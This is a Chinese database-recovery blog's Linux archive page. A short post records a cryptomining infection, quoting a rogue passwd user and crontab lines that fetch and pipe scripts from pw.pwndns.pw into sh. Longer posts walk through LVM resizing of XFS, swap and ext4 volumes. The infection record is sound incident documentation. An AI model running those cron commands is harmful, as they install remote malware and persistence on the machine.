-
加我微信
加我QQ
标签云
asm mount asm恢复 bbed bootstrap$ dul In Memory kcbzib_kcrsds_1 kccpb_sanity_check_2 kfed MySQL恢复 ORA-00312 ORA-00607 ORA-00704 ORA-01092 ORA-01110 ORA-01190 ORA-01555 ORA-01578 ORA-08103 ORA-600 2662 ORA-600 3020 ORA-600 4000 ORA-600 4137 ORA-600 4193 ORA-600 4194 ORA-600 16703 ORA-15042 ORA-15196 ORACLE 12C oracle dul ORACLE PATCH Oracle Recovery Tools oracle加密恢复 oracle勒索 oracle异常恢复 ORACLE恢复 Oracle 恢复 ORACLE数据库恢复 oracle 比特币 OSD-04016 sql加密恢复 YOUR FILES ARE ENCRYPTED 勒索恢复 比特币 oracle 比特币加密文章分类
- Others (2)
- 中间件 (2)
- WebLogic (2)
- 操作系统 (91)
- 数据库 (1,396)
- DB2 (22)
- MySQL (58)
- Oracle (1,282)
- Data Guard (41)
- EXADATA (7)
- GoldenGate (20)
- ORA-xxxxx (147)
- ORACLE 12C (72)
- ORACLE 18C (6)
- ORACLE 19C (12)
- ORACLE 21C (3)
- Oracle ASM (58)
- Oracle Bug (7)
- Oracle RAC (41)
- Oracle 安全 (6)
- Oracle 开发 (25)
- Oracle 监听 (26)
- Oracle备份恢复 (426)
- Oracle安装升级 (70)
- Oracle性能优化 (62)
- 专题索引 (5)
- 勒索恢复 (59)
- PostgreSQL (10)
- SQL Server (26)
- SQL Server恢复 (7)
- TimesTen (7)
- 达梦数据库 (2)
- 生活娱乐 (2)
- 至理名言 (11)
- 虚拟化 (2)
- VMware (2)
- 软件开发 (24)
- Asp.Net (9)
- JavaScript (12)
- PHP (2)
- 小工具 (7)
-
最近发表
- .mallox加密数据库恢复
- ORA-600 6807恢复
- 2022年恢复第一单ORA-600 kokasgi1
- LockBit病毒oracle数据库恢复
- ORA-15130: diskgroup “ORADATA” is being dismounted
- frm和ibd文件数据库恢复
- 40T勒索加密Oracle数据库恢复
- recover database 报kcbs_dump_adv_state恢复
- ORA-00603 ORA-01092 ORA-600 kcbzib_kcrsds_1
- impdp TRANSFORM参数
- Exception [type: SIGSEGV, Address not mapped to object] [] [ kgegpa()+36]
- 校验代码为 6054 坏块故障修复
- 数据库文件被勒索改名数据库恢复—LOCK2G
- .makop加密数据库恢复
- .eking加密数据库恢复
- 19c sqlplus / as sysdba 登录慢分析
- 最近几种勒索病毒加密数据库可完美恢复
- Assistant: Download Reference for Oracle Database/GI PSU, SPU(CPU), Bundle Patches, Patchsets and Base Releases-202110
- .makop加密数据库恢复
- 19c 非第一个节点执行root.sh报Error 4 opening dom ASM/Self in 错误
友情链接
分类目录归档:Linux
记录一种挖矿病毒现象
最近有朋友遇到linux系统不行被注入了挖矿病毒,大概记录下存在问题
在/etc/passwd文件中有x用户
x:x:2001:2001::/home/x:/bin/bash
在root和x用户的crontab中有恶意执行任务
[root@localhost tmp]# crontab -u x -l * * * * * /var/tmp/.systemd/.systemd * * * * * /var/tmp/.update/.update */10 * * * * curl -fsSL http://pw.pwndns.pw/update.sh | sh -s uc @reboot curl -fsSL http://pw.pwndns.pw/reboot.sh | sh [root@localhost tmp]# crontab -l * * * * * /var/tmp/.systemd/.systemd */5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh
在/var/tmp下面有.systemd和.update文件夹
[root@localhost tmp]# ls -lart /var/tmp/ drwxr-xr-x 2 x tape 37 Jul 27 21:49 .systemd drwxr-xr-x 2 x tape 36 Jul 27 21:49 .update
lvm缩小xfs文件系统空间和对swap进行扩容操作
xfs文件系统lvm缩小空间操作(/home从100G减小到80G)
[root@xifenfei ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/rhel-root 449G 6.0G 443G 2% /
devtmpfs 63G 0 63G 0% /dev
tmpfs 63G 0 63G 0% /dev/shm
tmpfs 63G 20M 63G 1% /run
tmpfs 63G 0 63G 0% /sys/fs/cgroup
/dev/mapper/rhel-home 100G 38M 100G 1% /home
/dev/sda2 1014M 165M 850M 17% /boot
/dev/sda1 200M 9.8M 191M 5% /boot/efi
tmpfs 13G 4.0K 13G 1% /run/user/42
tmpfs 13G 32K 13G 1% /run/user/0
/dev/sr0 4.2G 4.2G 0 100% /media
[root@xifenfei u01]# xfsdump -f /home.xfsdump /home
xfsdump: using file dump (drive_simple) strategy
xfsdump: version 3.1.7 (dump format 3.0) - type ^C for status and control
============================= dump label dialog ==============================
please enter label for this dump session (timeout in 300 sec)
-> home
session label entered: "tar czvf /home.tar.gz /home
home"
--------------------------------- end dialog ---------------------------------
xfsdump: level 0 dump of xifenfei:/home
xfsdump: dump date: Fri Jun 25 11:37:13 2021
xfsdump: session id: 4d75008e-9927-417d-9722-52d13bb89eb0
xfsdump: session label:
xfsdump: ino map phase 1: constructing initial dump list
xfsdump: ino map phase 2: skipping (no pruning necessary)
xfsdump: ino map phase 3: skipping (only one dump stream)
xfsdump: ino map construction complete
xfsdump: estimated dump size: 4828224 bytes
xfsdump: /var/lib/xfsdump/inventory created
============================= media label dialog =============================
please enter label for media in drive 0 (timeout in 300 sec)
-> home
media label entered: "home"
--------------------------------- end dialog ---------------------------------
xfsdump: creating dump session media file 0 (media 0, file 0)
xfsdump: dumping ino map
xfsdump: dumping directories
xfsdump: dumping non-directory files
xfsdump: ending media file
xfsdump: media file size 4732672 bytes
xfsdump: dump size (non-dir files) : 4588480 bytes
xfsdump: dump complete: 4 seconds elapsed
xfsdump: Dump Summary:
xfsdump: stream 0 /home.xfsdump OK (success)
xfsdump: Dump Status: SUCCESS
[root@xifenfei u01]# umount /home
[root@xifenfei u01]# lvreduce -L 80G /dev/mapper/rhel-home
WARNING: Reducing active logical volume to 80.00 GiB.
THIS MAY DESTROY YOUR DATA (filesystem etc.)
Do you really want to reduce rhel/home? [y/n]: y
Size of logical volume rhel/home changed from 100.00 GiB (25600 extents) to 80.00 GiB (20480 extents).
Logical volume rhel/home successfully resized.
[root@xifenfei u01]# mkfs.xfs -f /dev/mapper/rhel-home
meta-data=/dev/mapper/rhel-home isize=512 agcount=16, agsize=1310720 blks
= sectsz=512 attr=2, projid32bit=1
= crc=1 finobt=0, sparse=0
data = bsize=4096 blocks=20971520, imaxpct=25
= sunit=64 swidth=64 blks
naming =version 2 bsize=4096 ascii-ci=0 ftype=1
log =internal log bsize=4096 blocks=10240, version=2
= sectsz=512 sunit=64 blks, lazy-count=1
realtime =none extsz=4096 blocks=0, rtextents=0
[root@xifenfei u01]# mount /home
xfsrestore -f /home.xfsdump /home
[root@xifenfei u01]# xfsrestore -f /home.xfsdump /home
xfsrestore: using file dump (drive_simple) strategy
xfsrestore: version 3.1.7 (dump format 3.0) - type ^C for status and control
xfsrestore: searching media for dump
xfsrestore: examining media file 0
xfsrestore: dump description:
xfsrestore: hostname: xifenfei
xfsrestore: mount point: /home
xfsrestore: volume: /dev/mapper/rhel-home
xfsrestore: session time: Fri Jun 25 11:37:13 2021
xfsrestore: level: 0
xfsrestore: session label: "tar czvf /home.tar.gz /home
home"
xfsrestore: media label: "home"
xfsrestore: file system id: b996cff9-332b-4c07-96e1-8335a1f23627
xfsrestore: session id: 4d75008e-9927-417d-9722-52d13bb89eb0
xfsrestore: media id: 6094b9b5-a45f-4638-a0e2-c1b982ead67b
xfsrestore: using online session inventory
xfsrestore: searching media for directory dump
xfsrestore: reading directories
xfsrestore: 119 directories and 188 entries processed
xfsrestore: directory post-processing
xfsrestore: restoring non-directory files
xfsrestore: restore complete: 0 seconds elapsed
xfsrestore: Restore Summary:
xfsrestore: stream 0 /home.xfsdump OK (success)
xfsrestore: Restore Status: SUCCESS
[root@xifenfei u01]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/rhel-root 449G 14G 435G 4% /
devtmpfs 63G 0 63G 0% /dev
tmpfs 63G 20M 63G 1% /run
tmpfs 63G 0 63G 0% /sys/fs/cgroup
/dev/sda2 1014M 165M 850M 17% /boot
/dev/sda1 200M 9.8M 191M 5% /boot/efi
tmpfs 13G 4.0K 13G 1% /run/user/42
tmpfs 13G 28K 13G 1% /run/user/0
/dev/sr0 4.2G 4.2G 0 100% /media
tmpfs 63G 0 63G 0% /dev/shm
/dev/mapper/rhel-home 80G 38M 80G 1% /home
xfs系统的lvm无法直接缩小空间,只能是通过xfsdump /home内容,然后lvm缩小空间重做xfs文件系统,再使用xfsdump还原
lvm扩容swap空间(swap从8G扩大到16G)
[root@xifenfei home]# free -m
total used free shared buff/cache available
Mem: 128355 86907 26110 274 15338 37632
Swap: 8192 0 8192
[root@xifenfei home]# lvextend -L 16GB /dev/rhel/swap
Size of logical volume rhel/swap changed from 8.00 GiB (2048 extents) to 16.00 GiB (4096 extents).
Logical volume rhel/swap successfully resized.
[root@xifenfei home]# sync;sync
[root@xifenfei home]# swapoff /dev/rhel/swap
mkswap /dev/rhel/swap
[root@xifenfei home]# mkswap /dev/rhel/swap
mkswap: /dev/rhel/swap: warning: wiping old swap signature.
swapon /dev/rhel/swap Setting up swapspace version 1, size = 16777212 KiB
no label, UUID=8d79ccf4-1796-49c9-968d-23abb67bc6eb
[root@xifenfei home]# swapon /dev/rhel/swap
[root@xifenfei home]# free -m
total used free shared buff/cache available
Mem: 128355 86907 26110 274 15338 37632
Swap: 16383 0 16383
ext4 lvm在线扩容
文件系统格式
[root@xifenfei~]# uname -a Linux datacenter 4.1.12-61.1.28.el6uek.x86_64 #2 SMP Thu Feb 23 20:03:53 PST 2017 x86_64 x86_64 x86_64 GNU/Linux [root@xifenfei~]# mount /dev/mapper/vg_datacenter-lv_root on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw) /dev/sda1 on /boot type ext4 (rw) /dev/mapper/vg_datacenter-lv_home on /home type ext4 (rw) /dev/mapper/vg_datacenter-lvu01 on /u01 type ext4 (rw) /dev/sdb1 on /oracle_data type ext4 (rw) none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw) [root@datacenter ~]#
linux扫描新磁盘
[root@xifenfei ~]# ls /sys/class/scsi_host/ host0 host1 host2 [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host0/scan [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host1/scan [root@xifenfei ~]# echo '- - -' > /sys/class/scsi_host/host2/scan
vg扩容
[root@xifenfei ~]# pvcreate /dev/sdc1 Physical volume "/dev/sdc1" successfully created [root@xifenfei ~]# vgs VG #PV #LV #SN Attr VSize VFree vg_xifenfei 1 4 0 wz--n- 499.51g 584.00m [root@xifenfei ~]# vgextend vg_xifenfei /dev/sdc1 Volume group "vg_xifenfei" successfully extended [root@xifenfei ~]# vgs VG #PV #LV #SN Attr VSize VFree vg_xifenfei 2 4 0 wz--n- 999.50g 500.56g
lv进行扩容
[root@xifenfei ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_xifenfei-lv_root
50G 6.4G 41G 14% /
tmpfs 63G 0 63G 0% /dev/shm
/dev/sda1 477M 84M 364M 19% /boot
/dev/mapper/vg_xifenfei-lv_home
1.9G 29M 1.8G 2% /home
/dev/mapper/vg_xifenfei-lvu01
436G 335G 80G 81% /u01
/dev/sdb1 985G 462G 473G 50% /oracle_data
[root@xifenfei ~]# lvresize -L +500G /dev/mapper/vg_xifenfei-lvu01
Size of logical volume vg_xifenfei/lvu01 changed from 443.00 GiB (113408 extents) to 943.00 GiB (241408 extents).
Logical volume lvu01 successfully resized.
[root@xifenfei ~]# resize2fs /dev/mapper/vg_xifenfei-lvu01
resize2fs 1.43-WIP (20-Jun-2013)
Filesystem at /dev/mapper/vg_xifenfei-lvu01 is mounted on /u01; on-line resizing required
old_desc_blocks = 28, new_desc_blocks = 59
The filesystem on /dev/mapper/vg_xifenfei-lvu01 is now 247201792 blocks long.
[root@xifenfei ~]# df -h
Filesystem Size Used Avail Use% Mounted on
/dev/mapper/vg_xifenfei-lv_root
50G 6.4G 41G 14% /
tmpfs 63G 0 63G 0% /dev/shm
/dev/sda1 477M 84M 364M 19% /boot
/dev/mapper/vg_xifenfei-lv_home
1.9G 29M 1.8G 2% /home
/dev/mapper/vg_xifenfei-lvu01
929G 335G 552G 38% /u01
/dev/sdb1 985G 462G 473G 50% /oracle_data